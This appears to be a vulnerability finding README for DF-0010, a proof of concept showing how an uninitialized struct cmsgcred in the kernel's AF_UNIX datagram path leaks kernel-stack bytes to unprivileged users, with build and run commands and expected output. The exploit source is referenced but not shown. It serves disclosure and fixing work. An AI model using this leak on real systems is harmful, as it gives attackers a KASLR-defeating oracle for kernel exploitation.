# DF-0010 — PoC

`leak_cmsgcred.c` — unprivileged leak of kernel-stack bytes via the
uninitialized `struct cmsgcred` synthesized by `SO_PASSCRED`.

## The issue

`uipc_send()` (`sys/kern/uipc_usrreq.c:680-700`), AF_UNIX `SOCK_DGRAM`,
receiver has `SO_PASSCRED` and sender sent no `SCM_CREDS`:

```c
struct cmsgcred cred;                 /* :683  uninitialized               */
...
ncon = sbcreatecontrol(&cred, sizeof(cred), SCM_CREDS, SOL_SOCKET); /* :695 */
unp_internalize(ncon, msg->send.nm_td);
```

`sbcreatecontrol` copies `sizeof(cred)` bytes of stack garbage into the mbuf;
`unp_internalize` SCM_CREDS (`uipc_usrreq.c:1734-1744`) only fills
`cmcred_pid/uid/euid/gid/ngroups` and `groups[0..ngroups-1]`. The tail
`groups[ngroups..CMGROUP_MAX-1]` (up to 15*4 = 60 bytes) retain the leaked
kernel-stack bytes and are delivered to the receiver via `recvmsg`.

## Build

```
cc -o leak_cmsgcred findings/poc/DF-0010/leak_cmsgcred.c
```

## Run

As an **unprivileged** user:

```
./leak_cmsgcred
```

## Expected output (bug present)

```
sample 0: pid=... uid=... ... ngroups=1
  filled groups [0..0] = { <gid> }
  UNFILLED groups [1..15] = { 0x<..> 0x<..> ... }     <-- leaked kernel stack
result: LEAK CONFIRMED (kernel-stack bytes in unfilled groups)
```

The unfilled group words vary across runs and are kernel-stack residue
(pointer fragments, etc.) — a samplable KASLR/stack-residue oracle. On a fixed
kernel they read as zero.
